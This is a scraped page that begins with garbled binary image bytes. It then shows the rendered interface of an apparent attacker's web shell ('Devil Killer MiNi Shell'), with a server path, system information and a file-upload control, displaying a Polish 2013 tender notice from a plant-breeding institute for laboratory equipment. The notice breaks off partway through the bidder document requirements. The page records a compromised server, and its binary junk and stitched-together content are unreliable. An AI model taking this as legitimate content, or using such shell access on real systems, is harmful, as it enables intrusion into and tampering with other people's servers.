JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/120585-N-2013.html

<p class="kh_header"><b>Błonie: Zakup aparatury badawczej, kontrolno-pomiarowej, sprzętu i wyposażenia laboratoryjnego dla Instytutu Hodowli i Aklimatyzacji Roślin-Państwowego Instytutu Badawczego w Radzikowie z podziałem na 33 pakiety.</b><br>
<b>Numer ogłoszenia: 120585 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hodowli i Aklimatyzacji Roślin , Radzików 1, 05-870 Błonie, woj. mazowieckie, tel. 22 7253611, faks 22 7254714.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ihar.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowy Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup aparatury badawczej, kontrolno-pomiarowej, sprzętu i wyposażenia laboratoryjnego dla Instytutu Hodowli i Aklimatyzacji Roślin-Państwowego Instytutu Badawczego w Radzikowie z podziałem na 33 pakiety..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Zakup aparatury badawczej, kontrolno-pomiarowej, sprzętu i wyposażenia laboratoryjnego dla Instytutu Hodowli i Aklimatyzacji Roślin-Państwowego Instytutu Badawczego w Radzikowie z podziałem na 33 pakiety. Zamawiający wymaga, aby wszystkie urządzenia były fabrycznie nowe.


Pakiet 1; Suszarka laboratoryjna z wymuszonym obiegiem - dla Oddziału IHAR-PIB w Poznaniu,
Pakiet 2; Kamera z programem do mikroskopu Jeneval kontrast firmy Carl Zeiss jena - dla oddziału IHAR-PIB w Poznaniu,
Pakiet 3; Wirówka z chłodzeniem- dla IHAR-PIB Radzików, Samodzielna Pracownia Oceny Jakości Produktów Roślinnych,
Pakiet 4; Wytrząsarka - dla IHAR-PIB Radzików, Samodzielna Pracownia Oceny Jakości Produktów Roślinnych,
Pakiet 5; Młocarenka jednokłosowa- laboratoryjna - dla Zakładu IHAR-PIB w Krakowie,
Pakiet 6; Osuszacz powietrza - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 7; Komora laminarna - dla Oddziału IHAR-PIB w Młochowie,
Pakiet 8; Suszarka laboratoryjna - dla IHAR-PIB Radzików, ZTRMiE-Pracownia Traw Pastewnych i Roślin Motylkowatych,
Pakiet 9; Komora laminarna - dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,
Pakiet 10; Zamrażarka niskotemperaturowa (-80°C) - dla Oddziału IHAR-PIB w Bydgoszczy,
Pakiet 11; Podajnik próbek do cytometru CyFlowR Robby 8 Autoloading Station, producent: Partec GmbH, - - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 12; Przystawka rozcierająca materiał roślinny (bulwy) do młynka Retsch - dla Oddziału IHAR-PIB w Młochowie,
Pakiet 13; Autoklaw pionowy o pojemności 50l, klasa S - dla Oddziału IHAR-PIB w Poznaniu,
Pakiet 14; Wytrząsarka wraz z zestawem sit do frakcjonowania nasion - dla IHAR-PIB Radzików, ZTRMiE- Pracownia Traw Pozapaszowych i Roślin Energetycznych,
Pakiet 15; Chlorofilomierz - dla IHAR-PIB Radzików, ZTRMiE- Pracownia Traw Pozapaszowych i Roslin Energetycznych,
Pakiet 16; Spektrofotometr - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 17; Termo-wytrząsarka z chłodzeniem - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 18; Aparat do destylacji wody - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 19; Myjka mikropłytek - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 20; Suszarka laboratoryjna z wymuszonym obiegiem powietrza - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 21; Zestaw do mieszania i wirowania próbek - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,
Pakiet 22; Stacja meteorologiczna - dla Oddziału IHAR-PIB w Jadwisinie,
Pakiet 23; Agregat chłodniczy z oprzyrządowaniem - dla Oddziału IHAR-PIB w Poznaniu,
Pakiet 24; Zestaw do epifluorescencji do mikroskopu Delta Opticall-1000 - dla IHAR-PIB Radzików, ZF- Pracownia Chorób Roślin,
Pakiet 25; Klimatyzator - dla IHAR-PIB Radzików, ZF- Pracownia Chorób Roślin,

Pakiet 26; Odpylacz mobilny - Ogród Botaniczny Krajowego Centrum Roślinnych Zasobów Genowych w Bydgoszczy,
Pakiet 27 - Autoklaw - dla Oddziału IHAR-PIB w Bydgoszczy,
Pakiet 28 - Szafa termostatyczna - dla Oddziału IHAR-PIB w Bydgoszczy,
Pakiet 29- Odciąg laboratoryjny - dla IHAR-PIB Radzików, ZNiN,
Pakiet 30 - Wytrząsarka laboratoryjna - dla IHAR-PIB Radzików, ZF-PCHR,
Pakiet 31 - System sterowania temperaturą powietrza w pomieszczeniu fitotronowym- Zakład IHAR-PIB w Boninie
Pakiet 32 - Automat do izolacji kwasów nukleinowych- dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,
Pakiet 33 - Termocykler gradientowy - dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,

2). Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 1- Załącznik nr 2/1 do SIWZ
Dla Pakietu 2 -Załącznik nr 2/2 do SIWZ
Dla Pakietu 3- Załącznik nr 2/3 do SIWZ
Dla Pakietu 4- Załącznik nr 2/4 do SIWZ
Dla Pakietu 5- Załącznik nr 2/5 do SIWZ
Dla Pakietu 6- Załącznik nr 2/6 do SIWZ
Dla Pakietu 7- Załącznik nr 2/7 do SIWZ
Dla Pakietu 8- Załącznik nr 2/8 do SIWZ
Dla Pakietu 9 -Załącznik nr 2/9 do SIWZ
Dla Pakietu 10 -Załącznik nr 2/10 do SIWZ
Dla Pakietu 11- Załącznik nr 2/11 do SIWZ
Dla Pakietu 12- Załącznik nr 2/12 do SIWZ
Dla Pakietu 13- Załącznik nr 2/13 do SIWZ
Dla Pakietu 14- Załącznik nr 2/14 do SIWZ
Dla Pakietu 15 - Załącznik nr 2/15 do SIWZ
Dla Pakietu 16 - Załącznik nr 2/16 do SIWZ
Dla Pakietu 17 - Załącznik nr 2/17 do SIWZ
Dla Pakietu 18 - Załącznik nr 2/18 do SIWZ
Dla Pakietu 19 - Załącznik nr 2/19 do SIWZ
Dla pakietu 20 - Załącznik nr 2/20 do SIWZ
Dla Pakietu 21- Załącznik nr 2/21 do SIWZ
Dla Pakietu 22 - Załącznik nr 2/22 do SIWZ
Dla Pakietu 23 - Załącznik nr 2/23 do SIWZ
Dla Pakietu 24 - Załącznik nr 2/24 do SIWZ
Dla Pakietu 25 - Załącznik nr 2/25 do SIWZ
Dla Pakietu 26 - Załącznik nr 2/26 do SIWZ
Dla pakietu 27 - Załącznik nr 2/27 do SIWZ
Dla Pakietu 28 - Załącznik nr 2/28 do SIWZ
Dla Pakietu 29- Załącznik nr 2/29 do SIWZ
Dla Pakietu 30 - Załącznik nr 2/30 do SIWZ
Dla Pakietu 31 - Załącznik nr 2/31 do SIWZ

Dla Pakietu 32 - Załącznik nr 2/32 do SIWZ
Dla Pakietu 33 - Załącznik nr 2/33 do SIWZ

3) Kod CPV:  

38000000-5 Sprzęt lab. optyczny i precyzyjny z wyjątkiem szklanego,
38120000-2 Przyrządy meteorologiczne,
38510000-3 Mikroskopy,
38651600-9 Kamery cyfrowe,
39717200-Urządzenia klimatyczne
42513200-7 Urządzenia chłodnicze
45331230-7 Instalowanie urządzeń chłodniczych
45331220-Instalowanie urządzeń klimatycznych
51430000-0 Usł Inst. Sprzętu laboratoryjnego,
80511000-9 Usł. Szkolenia personalne,
                       
§ 4. Termin wykonania zamówienia
1.	Zamówienie nalezy zrealizować w terminie:

Dla Pakietu1-..... .do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 2-.......4-6 tygodni od daty zawarcia umowy,
Dla Pakietu 3-.........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 4-...........6 tygodni od daty zawarcia umowy,
Dla Pakietu 5 - ...... 4 tygodnie od daty zawarcia umowy,
Dla Pakietu 6 - .......4 tygodnie od daty zawarcia umowy,
Dla Pakietu 7 - .........5 tygodni od daty zawarcia umowy,
Dla Pakietu 8 - .... do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 9  - .......4 tygodnie od daty zawarcia umowy,
Dla Pakietu 10 -.... 4-6 tygodni od daty zawarcia umowy,
Dla Pakietu 11 -..do 10 tygodni od daty zawarcia umowy,
Dla Pakietu 12 -.......4-6 tygodni od daty zawarciaumowy,
Dla Pakietu 13-.......6-7 tygodni od daty zawarcia umowy,
Dla Pakietu 14 -....do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 15 - ...do 4 tygodni od daty zawarcia umowy,
Dla Pakietu 16 - ....do 6 tygodni od daty zawarcia umowy,
Dla pakietu 17 - ....do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 18 -.....do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 19 -.......do 6 tygodni od daty zawacia umowy,
Dla Pakietu 20 -......do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 21 -......do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 22- .........4 tygodnie od daty zawarcia umowy, 
Dla Pakietu 23- ...........6 tygodni od daty zawarcia umowy,
Dla pakietu 24 - ........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 25 -.........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 26 -........4-6 tygodni od daty zawarcia umowy,
Dla Pakietu 27 - ........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 28 -.........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 29 -....... 4-5 tygodni od daty zawarcia umowy,
Dla Pakietu 30 -...........6 tygodni od daty zawarcia umowy,
Dla Pakietu 31 -.........4 tygodnie od daty zawarcia umowy,
Dla Pakietu 32 -.......do 6 tygodni od daty zawarcia umowy,
Dla Pakietu 33 -.......do 6 tygodni od daty zawarcia umowy,

2.	Miejsce realizacji zamówienia: 

Pakiety: 1; 2; 13; 23; - Oddział IHAR-PIB w Poznaniu, ul. Strzeszyńska 36, 60-479 Poznań,
Pakiety; 3; 4; 6; 8; 9; 11; 14-21; 24; 25; 29; 30; 32; 33 - IHAR-PIB Radzików, 05-870 Błonie,
Pakiet 5- Zakład IHAR-PIB w Krakowie, ul. Zawiła 4, 05-870 Kraków,
Pakiety: 7; 12 - Oddział IHAR-PIB w Młochowie, ul. Platanowa 19, 05-831 Młochów,
Pakiety: 10; 27; 28 - Oddział IHAR-PIB w Bydgoszczy, ul. Powstańców Wielkp10, 85-090 Bydgoszcz,
Pakiet 22 - Oddział IHAR-PIB w Jadwisinie, , 05-140 Serock,
Pakiet 26 - Ogród Botaniczny KCRZG w Bydgoszczy, ul. Jeździecka 5, 05-090 Bydgoszcz,
Pakiet 31 - Zakład IHAR-PIB w Boninie, k/Koszalina, 76-009 Bonin,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.12.00.00-2, 38.51.00.00-3, 38.65.16.00-9, 39.71.72.00-3, 42.51.32.00-7, 45.33.12.30-7, 45.33.12.20-4, 51.43.00.00-0, 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 33.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający  żąda od Wykonawców wniesienia wadium. w wysokości:

a). Pakiet 11 - 1800,00  zł  (słownie: jeden tysiąc osiemset złotych 00/100)
b). Pakiet 32- 3 000,00  zł (słownie: trzy tysiące złotych 00/100)
2. Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
a). pieniądzu; 
b). poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c). gwarancjach bankowych; 
d). gwarancjach ubezpieczeniowych; 
e). poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). 
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:

BGŻ s.a w Warszawie
47 2030 0045 1110 0000 0094 2390
z dopiskiem Wadium - DAT/13/N/D/2013

5.Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez zamawiającego będzie skuteczne wyłącznie z chwilą uznania tego rachunku bankowego przed upływem terminu składania ofert, gdyż dopiero uznanie tego rachunku bankowego kwotą wadium (wpływ środków pieniężnych z tytułu wadium na rachunek bankowy wskazany przez zamawiającego) powoduje, że zamawiający będzie w posiadaniu wadium. Wykonawca, który złoży ofertę i dokona wpłaty wadium wnoszonego w pieniądzu przelewem na rachunek bankowy wskazany przez zamawiającego przed upływem terminu składania ofert, a uznanie tego rachunku bankowego kwotą wadium (wpływ środków pieniężnych z tytułu wadium na rachunek bankowy wskazany przez zamawiającego) nastąpi po upływie terminu składania ofert - podlega wykluczeniu z postępowania w związku z art. 24 ust. 2 pkt 4 ustawy Pzp, a oferta takiego wykonawcy zostanie uznana za odrzuconą w związku z art. 24 ust. 4 ustawy Pzp.
6.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
7.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (tekst jednolity z 2010 r DzU. Nr 113, poz. 759 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie wykonania, co najmniej jednej głównej  dostawy o zakresie i wartości porównywalnej z przedmiotem zamówienia, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postepowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (tekst jednolity z 2010 r DzU. Nr 113, poz. 759 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (tekst jednolity z 2010 r DzU. Nr 113, poz. 759 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Zamawiający za spełnienie tego warunku uzna złożenie oświadczenia Wykonawcy ( art. 22 ust. 1 ustawy z 29 stycznia 2004 r. - Prawo zamówień Publicznych (tekst jednolity z 2010 r DzU. Nr 113, poz. 759 z późn. zmianami).
Zamawiający dokona oceny spełnienia przez wykonawców warunków udziału w postępowaniu na podstawie oświadczeń  lub dokumentów o których mowa w § 6.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">. W celu potwierdzenia, że oferowany przedmiot zamówienia  odpowiada  wymaganiom, Oferent   załącza do oferty:
        Dla wszystkich pakietów:
1)Folder lub kartę katalogową (w j. polskim) z których wynikać będzie, że oferowane urządzenie spełnia wymagania Zamawiającego
2)Certyfikat bezpieczeństwa-deklarację zgodności CE.
W momencie dostawy wykonawca dostarczy instrukcję obsługi w j. polskim lub angielskim  w wersji elektronicznej np. na CD lub papierowej -(w zależności od pakietu)

Ponadto Wykonawca jest zobowiązany załączyć do oferty:

Dla Pakietu 7;
 - dokument potwierdzający spełnienie normy EN-12469-2000

Dla Pakietu 9;
